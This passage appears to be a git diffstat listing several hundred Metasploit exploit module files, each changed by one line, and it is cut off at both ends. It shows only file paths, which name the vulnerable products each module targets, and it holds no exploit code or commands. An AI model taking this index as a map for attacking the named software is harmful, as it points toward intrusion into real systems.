modules/exploits/multi/http/freenas_exec_raw.rb | 2 +- modules/exploits/multi/http/gitlab_shell_exec.rb | 2 +- modules/exploits/multi/http/gitorious_graph.rb | 2 +- modules/exploits/multi/http/glassfish_deployer.rb | 2 +- modules/exploits/multi/http/glossword_upload_exec.rb | 2 +- modules/exploits/multi/http/glpi_install_rce.rb | 2 +- modules/exploits/multi/http/horde_href_backdoor.rb | 2 +- modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb | 2 +- modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb | 2 +- modules/exploits/multi/http/hp_sys_mgmt_exec.rb | 2 +- modules/exploits/multi/http/hyperic_hq_script_console.rb | 2 +- modules/exploits/multi/http/jboss_bshdeployer.rb | 2 +- modules/exploits/multi/http/jboss_deploymentfilerepository.rb | 2 +- modules/exploits/multi/http/jboss_maindeployer.rb | 2 +- modules/exploits/multi/http/jboss_seam_upload_exec.rb | 2 +- modules/exploits/multi/http/jenkins_script_console.rb | 2 +- modules/exploits/multi/http/jira_hipchat_template.rb | 2 +- modules/exploits/multi/http/kordil_edms_upload_exec.rb | 2 +- modules/exploits/multi/http/lcms_php_exec.rb | 2 +- modules/exploits/multi/http/log1cms_ajax_create_folder.rb | 2 +- modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb | 2 +- modules/exploits/multi/http/manageengine_auth_upload.rb | 2 +- modules/exploits/multi/http/manageengine_sd_uploader.rb | 2 +- modules/exploits/multi/http/manageengine_search_sqli.rb | 2 +- modules/exploits/multi/http/mantisbt_php_exec.rb | 2 +- modules/exploits/multi/http/mediawiki_thumb.rb | 2 +- modules/exploits/multi/http/mma_backdoor_upload.rb | 2 +- modules/exploits/multi/http/mobilecartly_upload_exec.rb | 2 +- modules/exploits/multi/http/mutiny_subnetmask_exec.rb | 2 +- modules/exploits/multi/http/netwin_surgeftp_exec.rb | 2 +- modules/exploits/multi/http/nibbleblog_file_upload.rb | 2 +- modules/exploits/multi/http/op5_license.rb | 2 +- modules/exploits/multi/http/op5_welcome.rb | 2 +- modules/exploits/multi/http/openfire_auth_bypass.rb | 2 +- modules/exploits/multi/http/openmediavault_cmd_exec.rb | 2 +- modules/exploits/multi/http/openx_backdoor_php.rb | 2 +- modules/exploits/multi/http/opmanager_socialit_file_upload.rb | 2 +- modules/exploits/multi/http/oracle_reports_rce.rb | 2 +- modules/exploits/multi/http/pandora_upload_exec.rb | 2 +- modules/exploits/multi/http/php_cgi_arg_injection.rb | 2 +- modules/exploits/multi/http/php_volunteer_upload_exec.rb | 2 +- modules/exploits/multi/http/phpfilemanager_rce.rb | 2 +- modules/exploits/multi/http/phpldapadmin_query_engine.rb | 2 +- modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb | 2 +- modules/exploits/multi/http/phpmyadmin_preg_replace.rb | 2 +- modules/exploits/multi/http/phpscheduleit_start_date.rb | 2 +- modules/exploits/multi/http/phptax_exec.rb | 2 +- modules/exploits/multi/http/phpwiki_ploticus_exec.rb | 2 +- modules/exploits/multi/http/plone_popen2.rb | 2 +- modules/exploits/multi/http/pmwiki_pagelist.rb | 2 +- modules/exploits/multi/http/polarcms_upload_exec.rb | 2 +- modules/exploits/multi/http/processmaker_exec.rb | 2 +- modules/exploits/multi/http/qdpm_upload_exec.rb | 2 +- modules/exploits/multi/http/rails_json_yaml_code_exec.rb | 2 +- modules/exploits/multi/http/rails_secret_deserialization.rb | 2 +- modules/exploits/multi/http/rails_xml_yaml_code_exec.rb | 2 +- .../multi/http/rocket_servergraph_file_requestor_rce.rb | 2 +- modules/exploits/multi/http/sflog_upload_exec.rb | 2 +- modules/exploits/multi/http/simple_backdoors_exec.rb | 2 +- modules/exploits/multi/http/sit_file_upload.rb | 2 +- modules/exploits/multi/http/snortreport_exec.rb | 2 +- .../exploits/multi/http/solarwinds_store_manager_auth_filter.rb | 2 +- modules/exploits/multi/http/sonicwall_gms_upload.rb | 2 +- modules/exploits/multi/http/splunk_mappy_exec.rb | 2 +- modules/exploits/multi/http/splunk_upload_app_exec.rb | 2 +- modules/exploits/multi/http/spree_search_exec.rb | 2 +- modules/exploits/multi/http/spree_searchlogic_exec.rb | 2 +- modules/exploits/multi/http/struts_code_exec.rb | 2 +- modules/exploits/multi/http/struts_code_exec_classloader.rb | 2 +- .../exploits/multi/http/struts_code_exec_exception_delegator.rb | 2 +- modules/exploits/multi/http/struts_code_exec_parameters.rb | 2 +- modules/exploits/multi/http/struts_default_action_mapper.rb | 2 +- modules/exploits/multi/http/struts_dev_mode.rb | 2 +- modules/exploits/multi/http/struts_include_params.rb | 2 +- modules/exploits/multi/http/stunshell_eval.rb | 2 +- modules/exploits/multi/http/stunshell_exec.rb | 2 +- modules/exploits/multi/http/sun_jsws_dav_options.rb | 2 +- modules/exploits/multi/http/sysaid_auth_file_upload.rb | 2 +- modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb | 2 +- modules/exploits/multi/http/testlink_upload_exec.rb | 2 +- modules/exploits/multi/http/tomcat_mgr_deploy.rb | 2 +- modules/exploits/multi/http/tomcat_mgr_upload.rb | 2 +- modules/exploits/multi/http/traq_plugin_exec.rb | 2 +- modules/exploits/multi/http/uptime_file_upload_1.rb | 2 +- modules/exploits/multi/http/v0pcr3w_exec.rb | 2 +- modules/exploits/multi/http/vbseo_proc_deutf.rb | 2 +- modules/exploits/multi/http/vbulletin_unserialize.rb | 2 +- modules/exploits/multi/http/visual_mining_netcharts_upload.rb | 2 +- modules/exploits/multi/http/vtiger_install_rce.rb | 2 +- modules/exploits/multi/http/vtiger_php_exec.rb | 2 +- modules/exploits/multi/http/vtiger_soap_upload.rb | 2 +- modules/exploits/multi/http/webpagetest_upload_exec.rb | 2 +- modules/exploits/multi/http/wikka_spam_exec.rb | 2 +- modules/exploits/multi/http/x7chat2_php_exec.rb | 2 +- modules/exploits/multi/http/zemra_panel_rce.rb | 2 +- .../multi/http/zenworks_configuration_management_upload.rb | 2 +- modules/exploits/multi/http/zenworks_control_center_upload.rb | 2 +- .../exploits/multi/http/zpanel_information_disclosure_rce.rb | 2 +- modules/exploits/multi/ids/snort_dce_rpc.rb | 2 +- modules/exploits/multi/misc/arkeia_agent_exec.rb | 2 +- modules/exploits/multi/misc/batik_svg_java.rb | 2 +- modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb | 2 +- modules/exploits/multi/misc/hp_vsa_exec.rb | 2 +- modules/exploits/multi/misc/indesign_server_soap.rb | 2 +- modules/exploits/multi/misc/java_jdwp_debugger.rb | 2 +- modules/exploits/multi/misc/java_jmx_server.rb | 2 +- modules/exploits/multi/misc/java_rmi_server.rb | 2 +- modules/exploits/multi/misc/legend_bot_exec.rb | 2 +- modules/exploits/multi/misc/openview_omniback_exec.rb | 2 +- modules/exploits/multi/misc/pbot_exec.rb | 2 +- modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb | 2 +- modules/exploits/multi/misc/ra1nx_pubcall_exec.rb | 2 +- modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb | 2 +- modules/exploits/multi/misc/w3tw0rk_exec.rb | 2 +- modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb | 2 +- .../exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb | 2 +- modules/exploits/multi/misc/zend_java_bridge.rb | 2 +- modules/exploits/multi/ntp/ntp_overflow.rb | 2 +- modules/exploits/multi/php/php_unserialize_zval_cookie.rb | 2 +- modules/exploits/multi/realserver/describe.rb | 2 +- modules/exploits/multi/samba/nttrans.rb | 2 +- modules/exploits/multi/samba/usermap_script.rb | 2 +- modules/exploits/multi/script/web_delivery.rb | 2 +- modules/exploits/multi/ssh/sshexec.rb | 2 +- modules/exploits/multi/svn/svnserve_date.rb | 2 +- modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb | 2 +- modules/exploits/multi/vnc/vnc_keyboard_exec.rb | 2 +- modules/exploits/multi/vpn/tincd_bof.rb | 2 +- modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb | 2 +- modules/exploits/netware/smb/lsass_cifs.rb | 2 +- modules/exploits/netware/sunrpc/pkernel_callit.rb | 2 +- modules/exploits/osx/afp/loginext.rb | 2 +- modules/exploits/osx/arkeia/type77.rb | 2 +- modules/exploits/osx/browser/mozilla_mchannel.rb | 2 +- modules/exploits/osx/browser/safari_file_policy.rb | 2 +- modules/exploits/osx/browser/safari_metadata_archive.rb | 2 +- .../osx/browser/safari_user_assisted_applescript_exec.rb | 2 +- .../osx/browser/safari_user_assisted_download_launch.rb | 2 +- modules/exploits/osx/browser/software_update.rb | 2 +- modules/exploits/osx/email/mailapp_image_exec.rb | 2 +- modules/exploits/osx/ftp/webstar_ftp_user.rb | 2 +- modules/exploits/osx/http/evocam_webserver.rb | 2 +- modules/exploits/osx/local/iokit_keyboard_root.rb | 2 +- modules/exploits/osx/local/nfs_mount_root.rb | 2 +- modules/exploits/osx/local/persistence.rb | 2 +- modules/exploits/osx/local/sudo_password_bypass.rb | 2 +- modules/exploits/osx/local/vmware_bash_function_root.rb | 2 +- modules/exploits/osx/mdns/upnp_location.rb | 2 +- modules/exploits/osx/misc/ufo_ai.rb | 2 +- modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb | 2 +- modules/exploits/osx/samba/lsa_transnames_heap.rb | 2 +- modules/exploits/osx/samba/trans2open.rb | 2 +- modules/exploits/solaris/dtspcd/heap_noir.rb | 2 +- modules/exploits/solaris/lpd/sendmail_exec.rb | 2 +- modules/exploits/solaris/samba/lsa_transnames_heap.rb | 2 +- modules/exploits/solaris/samba/trans2open.rb | 2 +- modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb | 2 +- modules/exploits/solaris/sunrpc/sadmind_exec.rb | 2 +- modules/exploits/solaris/sunrpc/ypupdated_exec.rb | 2 +- modules/exploits/solaris/telnet/fuser.rb | 2 +- modules/exploits/solaris/telnet/ttyprompt.rb | 2 +- modules/exploits/unix/dhcp/bash_environment.rb | 2 +- modules/exploits/unix/ftp/proftpd_133c_backdoor.rb | 2 +- modules/exploits/unix/ftp/proftpd_modcopy_exec.rb | 2 +- modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | 2 +- modules/exploits/unix/http/contentkeeperweb_mimencode.rb | 2 +- modules/exploits/unix/http/ctek_skyrouter.rb | 2 +- modules/exploits/unix/http/freepbx_callmenum.rb | 2 +- modules/exploits/unix/http/lifesize_room.rb | 2 +- modules/exploits/unix/http/twiki_debug_plugins.rb | 2 +- modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb | 2 +- modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb | 2 +- modules/exploits/unix/misc/distcc_exec.rb | 2 +- modules/exploits/unix/misc/qnx_qconn_exec.rb | 2 +- modules/exploits/unix/misc/spamassassin_exec.rb | 2 +- modules/exploits/unix/misc/xerox_mfp.rb | 2 +- modules/exploits/unix/misc/zabbix_agent_exec.rb | 2 +- modules/exploits/unix/smtp/clamav_milter_blackhole.rb | 2 +- modules/exploits/unix/smtp/exim4_string_format.rb | 2 +- modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb | 2 +- modules/exploits/unix/ssh/tectia_passwd_changereq.rb | 2 +- modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb | 2 +- modules/exploits/unix/webapp/arkeia_upload_exec.rb | 2 +- modules/exploits/unix/webapp/awstats_configdir_exec.rb | 2 +- modules/exploits/unix/webapp/awstats_migrate_exec.rb | 2 +- modules/exploits/unix/webapp/awstatstotals_multisort.rb | 2 +- modules/exploits/unix/webapp/barracuda_img_exec.rb | 2 +- modules/exploits/unix/webapp/base_qry_common.rb | 2 +- modules/exploits/unix/webapp/basilic_diff_exec.rb | 2 +- modules/exploits/unix/webapp/cacti_graphimage_exec.rb | 2 +- modules/exploits/unix/webapp/cakephp_cache_corruption.rb | 2 +- modules/exploits/unix/webapp/carberp_backdoor_exec.rb | 2 +- modules/exploits/unix/webapp/citrix_access_gateway_exec.rb | 2 +- modules/exploits/unix/webapp/clipbucket_upload_exec.rb | 2 +- modules/exploits/unix/webapp/coppermine_piceditor.rb | 2 +- modules/exploits/unix/webapp/datalife_preview_exec.rb | 2 +- modules/exploits/unix/webapp/dogfood_spell_exec.rb | 2 +- modules/exploits/unix/webapp/egallery_upload_exec.rb | 2 +- modules/exploits/unix/webapp/flashchat_upload_exec.rb | 2 +- modules/exploits/unix/webapp/foswiki_maketext.rb | 2 +- modules/exploits/unix/webapp/freepbx_config_exec.rb | 2 +- modules/exploits/unix/webapp/generic_exec.rb | 2 +- modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb | 2 +- modules/exploits/unix/webapp/google_proxystylesheet_exec.rb | 2 +- modules/exploits/unix/webapp/graphite_pickle_exec.rb | 2 +- modules/exploits/unix/webapp/guestbook_ssi_exec.rb | 2 +- modules/exploits/unix/webapp/hastymail_exec.rb | 2 +- modules/exploits/unix/webapp/havalite_upload_exec.rb | 2 +- modules/exploits/unix/webapp/horde_unserialize_exec.rb | 2 +- modules/exploits/unix/webapp/hybridauth_install_php_exec.rb | 2 +- modules/exploits/unix/webapp/instantcms_exec.rb | 2 +- .../exploits/unix/webapp/invision_pboard_unserialize_exec.rb | 2 +- modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb | 2 +- modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb | 2 +- modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb | 2 +- modules/exploits/unix/webapp/joomla_media_upload_exec.rb | 2 +- modules/exploits/unix/webapp/joomla_tinybrowser.rb | 2 +- modules/exploits/unix/webapp/kimai_sqli.rb | 2 +- modules/exploits/unix/webapp/libretto_upload_exec.rb | 2 +- modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb | 2 +- modules/exploits/unix/webapp/mambo_cache_lite.rb | 2 +- modules/exploits/unix/webapp/mitel_awc_exec.rb | 2 +- modules/exploits/unix/webapp/moinmoin_twikidraw.rb | 2 +- modules/exploits/unix/webapp/mybb_backdoor.rb | 2 +- modules/exploits/unix/webapp/nagios3_history_cgi.rb | 2 +- modules/exploits/unix/webapp/nagios3_statuswml_ping.rb | 2 +- modules/exploits/unix/webapp/nagios_graph_explorer.rb | 2 +- modules/exploits/unix/webapp/narcissus_backend_exec.rb | 2 +- modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb | 2 +- modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb | 2 +- modules/exploits/unix/webapp/openemr_upload_exec.rb | 2 +- modules/exploits/unix/webapp/opensis_modname_exec.rb | 2 +- modules/exploits/unix/webapp/openview_connectednodes_exec.rb | 2 +- modules/exploits/unix/webapp/openx_banner_edit.rb | 2 +- modules/exploits/unix/webapp/oracle_vm_agent_utl.rb | 2 +- modules/exploits/unix/webapp/oscommerce_filemanager.rb | 2 +- modules/exploits/unix/webapp/pajax_remote_exec.rb | 2 +- modules/exploits/unix/webapp/php_charts_exec.rb | 2 +- modules/exploits/unix/webapp/php_eval.rb | 2 +- modules/exploits/unix/webapp/php_include.rb | 2 +- modules/exploits/unix/webapp/php_vbulletin_template.rb | 2 +- modules/exploits/unix/webapp/php_xmlrpc_eval.rb | 2 +- modules/exploits/unix/webapp/phpbb_highlight.rb | 2 +- modules/exploits/unix/webapp/phpmyadmin_config.rb | 2 +- modules/exploits/unix/webapp/projectpier_upload_exec.rb | 2 +- modules/exploits/unix/webapp/projectsend_upload_exec.rb | 2 +- modules/exploits/unix/webapp/qtss_parse_xml_exec.rb | 2 +- modules/exploits/unix/webapp/redmine_scm_exec.rb | 2 +- modules/exploits/unix/webapp/seportal_sqli_exec.rb | 2 +- modules/exploits/unix/webapp/simple_e_document_upload_exec.rb | 2 +- .../exploits/unix/webapp/sixapart_movabletype_storable_exec.rb | 2 +- modules/exploits/unix/webapp/skybluecanvas_exec.rb | 2 +- modules/exploits/unix/webapp/sphpblog_file_upload.rb | 2 +- modules/exploits/unix/webapp/spip_connect_exec.rb | 2 +- modules/exploits/unix/webapp/squash_yaml_exec.rb | 2 +- modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb | 2 +- modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb | 2 +- modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb | 2 +- modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb | 2 +- modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb | 2 +- modules/exploits/unix/webapp/trixbox_langchoice.rb | 2 +- modules/exploits/unix/webapp/tuleap_unserialize_exec.rb | 2 +- modules/exploits/unix/webapp/twiki_history.rb | 2 +- modules/exploits/unix/webapp/twiki_maketext.rb | 2 +- modules/exploits/unix/webapp/twiki_search.rb | 2 +- modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb | 2 +- modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb | 2 +- modules/exploits/unix/webapp/webmin_show_cgi_exec.rb | 2 +- modules/exploits/unix/webapp/webtester_exec.rb | 2 +- modules/exploits/unix/webapp/wp_admin_shell_upload.rb | 2 +- modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb | 2 +- modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb | 2 +- .../exploits/unix/webapp/wp_creativecontactform_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_downloadmanager_upload.rb | 2 +- .../unix/webapp/wp_easycart_unrestricted_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_foxypress_upload.rb | 2 +- modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb | 2 +- .../exploits/unix/webapp/wp_google_document_embedder_exec.rb | 2 +- modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb | 2 +- .../exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_infusionsoft_upload.rb | 2 +- modules/exploits/unix/webapp/wp_lastpost_exec.rb | 2 +- modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_optimizepress_upload.rb | 2 +- .../unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_pixabay_images_upload.rb | 2 +- modules/exploits/unix/webapp/wp_platform_exec.rb | 2 +- modules/exploits/unix/webapp/wp_property_upload_exec.rb | 2 +- modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_revslider_upload_execute.rb | 2 +- modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb | 2 +- modules/exploits/unix/webapp/wp_symposium_shell_upload.rb | 2 +- modules/exploits/unix/webapp/wp_total_cache_exec.rb | 2 +- modules/exploits/unix/webapp/wp_worktheflow_upload.rb | 2 +- modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_wptouch_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb | 2 +- modules/exploits/unix/webapp/xoda_file_upload.rb | 2 +- modules/exploits/unix/webapp/zeroshell_exec.rb | 2 +- modules/exploits/unix/webapp/zimbra_lfi.rb | 2 +- modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb | 2 +- modules/exploits/unix/webapp/zpanel_username_exec.rb | 2 +- modules/exploits/unix/x11/x11_keyboard_exec.rb | 2 +- modules/exploits/windows/antivirus/ams_hndlrsvc.rb | 2 +- modules/exploits/windows/antivirus/ams_xfr.rb | 2 +- .../exploits/windows/antivirus/symantec_endpoint_manager_rce.rb | 2 +- modules/exploits/windows/antivirus/symantec_iao.rb | 2 +- modules/exploits/windows/antivirus/symantec_rtvscan.rb | 2 +- .../windows/antivirus/symantec_workspace_streaming_exec.rb | 2 +- modules/exploits/windows/antivirus/trendmicro_serverprotect.rb | 2 +- .../windows/antivirus/trendmicro_serverprotect_createbinding.rb | 2 +- .../windows/antivirus/trendmicro_serverprotect_earthagent.rb | 2 +- modules/exploits/windows/arkeia/type77.rb | 2 +- modules/exploits/windows/backdoor/energizer_duo_payload.rb | 2 +- modules/exploits/windows/backupexec/name_service.rb | 2 +- modules/exploits/windows/backupexec/remote_agent.rb | 2 +- modules/exploits/windows/brightstor/ca_arcserve_342.rb | 2 +- modules/exploits/windows/brightstor/discovery_tcp.rb | 2 +- modules/exploits/windows/brightstor/discovery_udp.rb | 2 +- modules/exploits/windows/brightstor/etrust_itm_alert.rb | 2 +- modules/exploits/windows/brightstor/hsmserver.rb | 2 +- modules/exploits/windows/brightstor/lgserver.rb | 2 +- modules/exploits/windows/brightstor/lgserver_multi.rb | 2 +- modules/exploits/windows/brightstor/lgserver_rxrlogin.rb | 2 +- .../brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb | 2 +- .../exploits/windows/brightstor/lgserver_rxsuselicenseini.rb | 2 +- modules/exploits/windows/brightstor/license_gcr.rb | 2 +- modules/exploits/windows/brightstor/mediasrv_sunrpc.rb | 2 +- modules/exploits/windows/brightstor/message_engine.rb | 2 +- modules/exploits/windows/brightstor/message_engine_72.rb | 2 +- modules/exploits/windows/brightstor/message_engine_heap.rb | 2 +- modules/exploits/windows/brightstor/sql_agent.rb | 2 +- modules/exploits/windows/brightstor/tape_engine.rb | 2 +- modules/exploits/windows/brightstor/tape_engine_0x8a.rb | 2 +- modules/exploits/windows/brightstor/universal_agent.rb | 2 +- modules/exploits/windows/browser/adobe_cooltype_sing.rb | 2 +- modules/exploits/windows/browser/adobe_flash_avm2.rb | 2 +- .../exploits/windows/browser/adobe_flash_casi32_int_overflow.rb | 2 +- .../windows/browser/adobe_flash_copy_pixels_to_byte_array.rb | 2 +- .../exploits/windows/browser/adobe_flash_domain_memory_uaf.rb | 2 +- .../windows/browser/adobe_flash_filters_type_confusion.rb | 2 +- modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb | 2 +- modules/exploits/windows/browser/adobe_flash_otf_font.rb | 2 +- modules/exploits/windows/browser/adobe_flash_pcre.rb | 2 +- modules/exploits/windows/browser/adobe_flash_regex_value.rb | 2 +- modules/exploits/windows/browser/adobe_flash_rtmp.rb | 2 +- modules/exploits/windows/browser/adobe_flash_sps.rb | 2 +- .../browser/adobe_flash_uncompress_zlib_uninitialized.rb | 2 +- .../windows/browser/adobe_flash_worker_byte_array_uaf.rb | 2 +- .../exploits/windows/browser/adobe_flashplayer_arrayindexing.rb | 2 +- modules/exploits/windows/browser/adobe_flashplayer_avm.rb | 2 +- modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb | 2 +- .../exploits/windows/browser/adobe_flashplayer_newfunction.rb | 2 +- .../exploits/windows/browser/adobe_flatedecode_predictor02.rb | 2 +- modules/exploits/windows/browser/adobe_geticon.rb | 2 +- modules/exploits/windows/browser/adobe_jbig2decode.rb | 2 +- modules/exploits/windows/browser/adobe_media_newplayer.rb | 2 +- .../exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb | 2 +- modules/exploits/windows/browser/adobe_toolbutton.rb | 2 +- modules/exploits/windows/browser/adobe_utilprintf.rb | 2 +- .../windows/browser/advantech_webaccess_dvs_getcolor.rb | 2 +- modules/exploits/windows/browser/aim_goaway.rb | 2 +- modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb | 2 +- modules/exploits/windows/browser/amaya_bdo.rb | 2 +- modules/exploits/windows/browser/aol_ampx_convertfile.rb | 2 +- modules/exploits/windows/browser/aol_icq_downloadagent.rb | 2 +- modules/exploits/windows/browser/apple_itunes_playlist.rb | 2 +- .../exploits/windows/browser/apple_quicktime_marshaled_punk.rb | 2 +- modules/exploits/windows/browser/apple_quicktime_mime_type.rb | 2 +- modules/exploits/windows/browser/apple_quicktime_rtsp.rb | 2 +- modules/exploits/windows/browser/apple_quicktime_smil_debug.rb | 2 +- .../windows/browser/apple_quicktime_texml_font_table.rb | 2 +- modules/exploits/windows/browser/ask_shortformat.rb | 2 +- modules/exploits/windows/browser/asus_net4switch_ipswcom.rb | 2 +- .../exploits/windows/browser/athocgov_completeinstallation.rb | 2 +- modules/exploits/windows/browser/autodesk_idrop.rb | 2 +- modules/exploits/windows/browser/aventail_epi_activex.rb | 2 +- modules/exploits/windows/browser/awingsoft_web3d_bof.rb | 2 +- modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb | 2 +- .../windows/browser/baofeng_storm_onbeforevideodownload.rb | 2 +- modules/exploits/windows/browser/barcode_ax49.rb | 2 +- .../exploits/windows/browser/blackice_downloadimagefileurl.rb | 2 +- .../exploits/windows/browser/c6_messenger_downloaderactivex.rb | 2 +- modules/exploits/windows/browser/ca_brightstor_addcolumn.rb | 2 +- modules/exploits/windows/browser/chilkat_crypt_writefile.rb | 2 +- modules/exploits/windows/browser/cisco_anyconnect_exec.rb | 2 +- modules/exploits/windows/browser/cisco_playerpt_setsource.rb | 2 +- .../exploits/windows/browser/cisco_playerpt_setsource_surl.rb | 2 +- modules/exploits/windows/browser/citrix_gateway_actx.rb | 2 +- modules/exploits/windows/browser/clear_quest_cqole.rb | 2 +- modules/exploits/windows/browser/communicrypt_mail_activex.rb | 2 +- .../exploits/windows/browser/creative_software_cachefolder.rb | 2 +- .../exploits/windows/browser/crystal_reports_printcontrol.rb | 2 +- modules/exploits/windows/browser/dell_webcam_crazytalk.rb | 2 +- modules/exploits/windows/browser/dxstudio_player_exec.rb | 2 +- modules/exploits/windows/browser/ea_checkrequirements.rb | 2 +- .../exploits/windows/browser/ebook_flipviewer_fviewerloading.rb | 2 +- modules/exploits/windows/browser/enjoysapgui_comp_download.rb | 2 +- .../exploits/windows/browser/enjoysapgui_preparetoposthtml.rb | 2 +- modules/exploits/windows/browser/facebook_extractiptc.rb | 2 +- modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb | 2 +- modules/exploits/windows/browser/getgodm_http_response_bof.rb | 2 +- modules/exploits/windows/browser/gom_openurl.rb | 2 +- modules/exploits/windows/browser/greendam_url.rb | 2 +- .../exploits/windows/browser/honeywell_hscremotedeploy_exec.rb | 2 +- modules/exploits/windows/browser/honeywell_tema_exec.rb | 2 +- .../windows/browser/hp_alm_xgo_setshapenodetype_exec.rb | 2 +- .../windows/browser/hp_easy_printer_care_xmlcachemgr.rb | 2 +- .../windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb | 2 +- modules/exploits/windows/browser/hp_loadrunner_addfile.rb | 2 +- modules/exploits/windows/browser/hp_loadrunner_addfolder.rb | 2 +- .../exploits/windows/browser/hp_loadrunner_writefilebinary.rb | 2 +- .../exploits/windows/browser/hp_loadrunner_writefilestring.rb | 2 +- modules/exploits/windows/browser/hpmqc_progcolor.rb | 2 +- modules/exploits/windows/browser/hyleos_chemviewx_activex.rb | 2 +- modules/exploits/windows/browser/ibm_spss_c1sizer.rb | 2 +- modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb | 2 +- modules/exploits/windows/browser/ibmegath_getxmlvalue.rb | 2 +- .../exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb | 2 +- modules/exploits/windows/browser/ie_cbutton_uaf.rb | 2 +- modules/exploits/windows/browser/ie_cgenericelement_uaf.rb | 2 +- modules/exploits/windows/browser/ie_createobject.rb | 2 +- modules/exploits/windows/browser/ie_execcommand_uaf.rb | 2 +- modules/exploits/windows/browser/ie_iscomponentinstalled.rb | 2 +- modules/exploits/windows/browser/ie_setmousecapture_uaf.rb | 2 +- modules/exploits/windows/browser/ie_unsafe_scripting.rb | 2 +- .../exploits/windows/browser/imgeviewer_tifmergemultifiles.rb | 2 +- .../windows/browser/indusoft_issymbol_internationalseparator.rb | 2 +- modules/exploits/windows/browser/inotes_dwa85w_bof.rb | 2 +- modules/exploits/windows/browser/intrust_annotatex_add.rb | 2 +- modules/exploits/windows/browser/java_basicservice_impl.rb | 2 +- modules/exploits/windows/browser/java_cmm.rb | 2 +- modules/exploits/windows/browser/java_codebase_trust.rb | 2 +- modules/exploits/windows/browser/java_docbase_bof.rb | 2 +- modules/exploits/windows/browser/java_mixer_sequencer.rb | 2 +- modules/exploits/windows/browser/java_ws_arginject_altjvm.rb | 2 +- modules/exploits/windows/browser/java_ws_double_quote.rb | 2 +- modules/exploits/windows/browser/java_ws_vmargs.rb | 2 +- modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb | 2 +- modules/exploits/windows/browser/kazaa_altnet_heap.rb | 2 +- modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb | 2 +- modules/exploits/windows/browser/logitechvideocall_start.rb | 2 +- modules/exploits/windows/browser/lpviewer_url.rb | 2 +- .../exploits/windows/browser/macrovision_downloadandexecute.rb | 2 +- modules/exploits/windows/browser/macrovision_unsafe.rb | 2 +- modules/exploits/windows/browser/malwarebytes_update_exec.rb | 2 +- modules/exploits/windows/browser/maxthon_history_xcs.rb | 2 +- modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb | 2 +- modules/exploits/windows/browser/mcafee_mvt_exec.rb | 2 +- .../exploits/windows/browser/mcafeevisualtrace_tracetarget.rb | 2 +- modules/exploits/windows/browser/mirc_irc_url.rb | 2 +- modules/exploits/windows/browser/mozilla_attribchildremoved.rb | 2 +- .../windows/browser/mozilla_firefox_onreadystatechange.rb | 2 +- .../exploits/windows/browser/mozilla_firefox_xmlserializer.rb | 2 +- modules/exploits/windows/browser/mozilla_interleaved_write.rb | 2 +- modules/exploits/windows/browser/mozilla_mchannel.rb | 2 +- modules/exploits/windows/browser/mozilla_nssvgvalue.rb | 2 +- modules/exploits/windows/browser/mozilla_nstreerange.rb | 2 +- modules/exploits/windows/browser/mozilla_reduceright.rb | 2 +- modules/exploits/windows/browser/ms03_020_ie_objecttype.rb | 